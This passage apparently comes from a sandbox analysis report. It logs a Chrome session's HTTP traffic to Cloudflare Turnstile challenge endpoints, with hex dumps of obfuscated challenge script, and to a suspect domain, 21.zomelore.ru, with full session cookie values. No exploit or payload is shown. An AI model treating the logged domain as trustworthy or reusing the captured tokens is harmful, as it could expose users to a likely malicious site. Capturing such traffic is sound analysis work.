                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ahw4n/0x4AAAAAAA1QAANc6ALCga__/auto/fbE/normal/auto/
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:28:57 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:28:57 GMT
                                                                                                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                          Content-Length: 119096
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8f0941094e9c0cc6-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          2024-12-11 23:28:57 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 78 45 4a 58 34 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70
                                                                                                                                                                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.xEJX4={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcep
                                                                                                                                                                                                          2024-12-11 23:28:57 UTC1369INData Raw: 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65 64 62 61 63 6b 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69
                                                                                                                                                                                                          Data Ascii: 20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_feedback_description":"Send%20Feedback","turnstile_footer_pri
                                                                                                                                                                                                          2024-12-11 23:28:57 UTC1369INData Raw: 67 30 2c 67 36 2c 67 37 2c 67 38 2c 67 69 2c 67 74 2c 67 78 2c 67 45 2c 65 59 2c 65 5a 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 34 31 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 34 36 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 38 33 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 32 39 31 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 34 39 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 31 39 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 36 35 31 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28
                                                                                                                                                                                                          Data Ascii: g0,g6,g7,g8,gi,gt,gx,gE,eY,eZ){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1141))/1*(parseInt(gI(1246))/2)+-parseInt(gI(1283))/3+-parseInt(gI(291))/4*(-parseInt(gI(1049))/5)+-parseInt(gI(1019))/6*(parseInt(gI(651))/7)+parseInt(
                                                                                                                                                                                                          2024-12-11 23:28:57 UTC1369INData Raw: 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 68 38 28 38 38 38 29 5d 5b 68 38 28 31 30 34 30 29 5d 28 42 29 2c 43 3d 30 3b 43 3c 78 5b 68 38 28 33 33 30 29 5d 3b 68 38 28 31 34 31 33 29 3d 3d 3d 68 38 28 31 36 31 30 29 3f 68 5b 68 38 28 36 36 39 29 5d 5b 68 38 28 31 34 33 31 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 6f 5b 68 38 28 37 36 33 29 5d 2c 27 77 69 64 67 65 74 49 64 27 3a 69 5b 68 38 28 31 30 32 30 29 5d 5b 68 38 28 37 34 36 29 5d 2c 27 65 76 65 6e 74 27 3a 68 38 28 35 35 32 29 2c 27 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 27 3a 6a 2c 27 64 69 73 70 6c 61 79 52 54 4c 27 3a 44 5b 68 38 28 31 30 32 30 29 5d 5b 68 38 28 31 32 35 39 29 5d 5b 68 38 28 31 34 35 32 29 5d 2c 27 74
                                                                                                                                                                                                          Data Ascii: eturn G}(x),B='nAsAaAb'.split('A'),B=B[h8(888)][h8(1040)](B),C=0;C<x[h8(330)];h8(1413)===h8(1610)?h[h8(669)][h8(1431)]({'source':o[h8(763)],'widgetId':i[h8(1020)][h8(746)],'event':h8(552),'displayLanguage':j,'displayRTL':D[h8(1020)][h8(1259)][h8(1452)],'t
                                                                                                                                                                                                          2024-12-11 23:28:57 UTC1369INData Raw: 27 2c 73 29 7d 29 7d 65 6c 73 65 20 6e 28 6a 2c 68 29 7d 2c 65 59 3d 5b 5d 2c 65 5a 3d 30 3b 32 35 36 3e 65 5a 3b 65 59 5b 65 5a 5d 3d 53 74 72 69 6e 67 5b 67 4a 28 37 34 37 29 5d 28 65 5a 29 2c 65 5a 2b 2b 29 3b 66 30 3d 28 30 2c 65 76 61 6c 29 28 67 4a 28 31 35 31 31 29 29 2c 66 31 3d 61 74 6f 62 28 67 4a 28 31 31 33 39 29 29 2c 66 72 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 68 47 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 68 47 3d 67 4a 2c 67 3d 7b 7d 2c 67 5b 68 47 28 33 36 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 2b 73 7d 2c 67 5b 68 47 28 37 35 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 25 73 7d 2c 68 3d 67 2c 6d 2c 6a 3d 33 32 2c 6c 3d 65 4d 5b 68 47 28 31 30 32 30
                                                                                                                                                                                                          Data Ascii: ',s)})}else n(j,h)},eY=[],eZ=0;256>eZ;eY[eZ]=String[gJ(747)](eZ),eZ++);f0=(0,eval)(gJ(1511)),f1=atob(gJ(1139)),fr=function(f,hG,g,h,i,j,k,l,m){for(hG=gJ,g={},g[hG(364)]=function(n,s){return n+s},g[hG(753)]=function(n,s){return n%s},h=g,m,j=32,l=eM[hG(1020
                                                                                                                                                                                                          2024-12-11 23:28:57 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 56 68 6d 78 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 4f 78 47 5a 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 71 79 5a 52 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 43 7a 48 72 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4e 47 49 75 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 55 58 4c 65 66 27 3a 68 49 28 36 34 35 29 2c 27 6e 59 42 46 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 4c 4f 52 5a 46 27
                                                                                                                                                                                                          Data Ascii: nction(h,i){return h==i},'Vhmxe':function(h,i){return i*h},'OxGZe':function(h,i){return h!=i},'qyZRw':function(h,i){return h*i},'CzHrL':function(h,i){return h(i)},'NGIuT':function(h,i){return h<i},'UXLef':hI(645),'nYBFQ':function(h,i){return i==h},'LORZF'
                                                                                                                                                                                                          2024-12-11 23:28:57 UTC1369INData Raw: 3d 3d 64 5b 68 51 28 35 38 37 29 5d 29 7b 69 66 28 4b 3d 69 5b 68 51 28 31 30 35 34 29 5d 28 4a 29 2c 4f 62 6a 65 63 74 5b 68 51 28 35 30 31 29 5d 5b 68 51 28 39 35 38 29 5d 5b 68 51 28 31 32 33 35 29 5d 28 78 2c 4b 29 7c 7c 28 78 5b 4b 5d 3d 45 2b 2b 2c 42 5b 4b 5d 3d 21 30 29 2c 4c 3d 64 5b 68 51 28 33 37 32 29 5d 28 43 2c 4b 29 2c 4f 62 6a 65 63 74 5b 68 51 28 35 30 31 29 5d 5b 68 51 28 39 35 38 29 5d 5b 68 51 28 31 32 33 35 29 5d 28 78 2c 4c 29 29 43 3d 4c 3b 65 6c 73 65 20 66 6f 72 28 4d 3d 68 51 28 35 39 33 29 5b 68 51 28 35 39 34 29 5d 28 27 7c 27 29 2c 4e 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 4d 5b 4e 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 44 2d 2d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 78 5b 4c 5d 3d 45 2b 2b 3b 63 6f
                                                                                                                                                                                                          Data Ascii: ==d[hQ(587)]){if(K=i[hQ(1054)](J),Object[hQ(501)][hQ(958)][hQ(1235)](x,K)||(x[K]=E++,B[K]=!0),L=d[hQ(372)](C,K),Object[hQ(501)][hQ(958)][hQ(1235)](x,L))C=L;else for(M=hQ(593)[hQ(594)]('|'),N=0;!![];){switch(M[N++]){case'0':D--;continue;case'1':x[L]=E++;co
                                                                                                                                                                                                          2024-12-11 23:28:57 UTC1369INData Raw: 3e 43 5b 68 51 28 31 31 32 32 29 5d 28 30 29 29 7b 66 6f 72 28 73 3d 30 3b 73 3c 46 3b 48 3c 3c 3d 31 2c 64 5b 68 51 28 38 30 39 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 68 51 28 37 33 33 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4f 3d 43 5b 68 51 28 31 31 32 32 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 68 51 28 31 34 39 36 29 5d 28 38 2c 73 29 3b 48 3d 64 5b 68 51 28 31 35 32 36 29 5d 28 48 3c 3c 31 2e 34 31 2c 4f 26 31 29 2c 64 5b 68 51 28 34 30 37 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 68 51 28 37 33 33 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4f 3d 31 2c 73 3d 30 3b 64 5b 68 51 28 31 34 38 31 29 5d 28 73 2c 46 29 3b 48 3d
                                                                                                                                                                                                          Data Ascii: >C[hQ(1122)](0)){for(s=0;s<F;H<<=1,d[hQ(809)](I,j-1)?(I=0,G[hQ(733)](o(H)),H=0):I++,s++);for(O=C[hQ(1122)](0),s=0;d[hQ(1496)](8,s);H=d[hQ(1526)](H<<1.41,O&1),d[hQ(407)](I,j-1)?(I=0,G[hQ(733)](o(H)),H=0):I++,O>>=1,s++);}else{for(O=1,s=0;d[hQ(1481)](s,F);H=
                                                                                                                                                                                                          2024-12-11 23:28:57 UTC1369INData Raw: 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 54 28 31 36 31 31 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 64 5b 68 54 28 31 33 39 31 29 5d 28 46 2c 4b 29 3b 4e 3d 47 26 48 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 68 54 28 31 30 36 35 29 5d 28 64 5b 68 54 28 35 36 36 29 5d 28 30 2c 4e 29 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 4f 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 54 28 31 36 31 31 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4e 3d 48 26 47 2c 48 3e 3e 3d 31 2c 64 5b 68 54 28 31 33 37 35 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 64 5b 68 54 28 31 32 37 34 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 68 54 28 36
                                                                                                                                                                                                          Data Ascii: or(J=0,K=Math[hT(1611)](2,8),F=1;d[hT(1391)](F,K);N=G&H,H>>=1,H==0&&(H=j,G=o(I++)),J|=d[hT(1065)](d[hT(566)](0,N)?1:0,F),F<<=1);O=e(J);break;case 1:for(J=0,K=Math[hT(1611)](2,16),F=1;K!=F;N=H&G,H>>=1,d[hT(1375)](0,H)&&(H=j,G=d[hT(1274)](o,I++)),J|=(d[hT(6
                                                                                                                                                                                                          2024-12-11 23:28:57 UTC1369INData Raw: 36 36 33 29 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 68 56 28 31 30 32 30 29 5d 5b 68 56 28 37 34 36 29 5d 2c 27 65 76 65 6e 74 27 3a 65 5b 68 56 28 32 37 37 29 5d 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 68 56 28 31 30 32 30 29 5d 5b 68 56 28 35 30 34 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 68 56 28 31 30 32 30 29 5d 5b 68 56 28 38 34 34 29 5d 2c 27 63 6f 64 65 27 3a 65 5b 68 56 28 31 32 35 34 29 5d 2c 27 72 63 56 27 3a 65 4d 5b 68 56 28 31 30 32 30 29 5d 5b 68 56 28 31 35 34 37 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 65 4d 5b 67 4a 28 31 36 33 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 68 57 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 29 7b 69 3d 28 68 57 3d 67 4a 2c 7b 27 66 4d 51 43
                                                                                                                                                                                                          Data Ascii: 663),'widgetId':eM[hV(1020)][hV(746)],'event':e[hV(277)],'cfChlOut':eM[hV(1020)][hV(504)],'cfChlOutS':eM[hV(1020)][hV(844)],'code':e[hV(1254)],'rcV':eM[hV(1020)][hV(1547)]},'*'))},g)},eM[gJ(1631)]=function(f,g,h,hW,i,j,k,l,m,n,o,s,x,B,C,D){i=(hW=gJ,{'fMQC


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          14192.168.2.449762104.18.94.414431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:28:57 UTC739OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ahw4n/0x4AAAAAAA1QAANc6ALCga__/auto/fbE/normal/auto/
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:28:58 UTC240INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:28:58 GMT
                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                          Content-Length: 61
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          cache-control: max-age=2629800, public
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8f09410a8fe56a5e-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          2024-12-11 23:28:58 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          15192.168.2.449747104.21.73.644431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:28:58 UTC1316OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                          Host: 21.zomelore.ru
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                          Referer: https://21.zomelore.ru/rwDHrVWE/
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6InByMlNjQjBmZTBobVovamVRUWI2R2c9PSIsInZhbHVlIjoiYkM3eVFJQ0lqVHNMMHlEejFHK2dOaU80NnBwMVc4U1U3RnN5NlRad0xRV0xkYzlQKzNOZW1CSHVuTHY0ZnFyYXc1VUZNaDhaRDhISnF3ZHFvRzZlWXNGYStxTFZPNmo0MzBLeG5DdHlML1NoeTRtQUVZMml4NUdHY2Z5aFB3UVYiLCJtYWMiOiJjZDQxMjRhZmI1NzlhNDVlNGMzNzk0MWIxYTdiYjMyNmUxYjg1ZTRiMjk4NDI3MTg2NDk2MzI1MWM2Y2IzZTFiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikt0Mkhkc0tqOFpqYkVGRzRPcUJJNXc9PSIsInZhbHVlIjoibDNmZHpxcU5QcnkyZTg3WkI0T1JvVG4ybHZSbmhnY2N2bHViUStZSEJ0UDhnUitRVnRMVGFaM0ZaUHhzTlYrRDN0MnI5NXMrbkMrRit3VUhQR1ZYUS9EQS9RSXd0T3FyM20zaWZYSnREcnUrRWVxZHVGanRBYTlaUDYrWWhvZ0oiLCJtYWMiOiI4ODUxZWEwYWQzMzc3YzdmOTQ2MmU2OGIxNDQ0YTAyOTFhM2VkZmExNmU5NWFhZGY4NzUyMTM4Njg4Y2I4NGFiIiwidGFnIjoiIn0%3D
                                                                                                                                                                                                          2024-12-11 23:28:59 UTC1061INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:28:59 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Cache-Control: max-age=14400
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xg3i%2F2DJOn9RrO%2FysZQ3HiAyoGL%2FSSgwNmx0epxf6oxUA2gyXkka%2BCmv7yfq%2BD7ZJsuOZpQeJbeDhfYcs0mPXYub5khf8ymrsIE4ttITO8U1bNu23GvWDb35Q4wwPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1647&rtt_var=645&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2228&delivery_rate=2301650&cwnd=252&unsent_bytes=0&cid=7cf543b603d3b0b1&ts=296&x=0"
                                                                                                                                                                                                          CF-Cache-Status: MISS
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8f09410f4eb8428f-EWR
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1592&rtt_var=644&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1894&delivery_rate=1834170&cwnd=83&unsent_bytes=0&cid=f1d978c3879e8fef&ts=9670&x=0"
                                                                                                                                                                                                          2024-12-11 23:28:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          16192.168.2.449764104.18.95.414431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:28:59 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:28:59 UTC240INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:28:59 GMT
                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                          Content-Length: 61
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          cache-control: max-age=2629800, public
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8f094114f8c343a4-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          2024-12-11 23:28:59 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          17192.168.2.449765104.18.95.414431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:28:59 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8f0940fe6c4f4373&lang=auto HTTP/1.1
                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:29:00 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:29:00 GMT
                                                                                                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                          Content-Length: 123212
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8f0941178f02727b-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
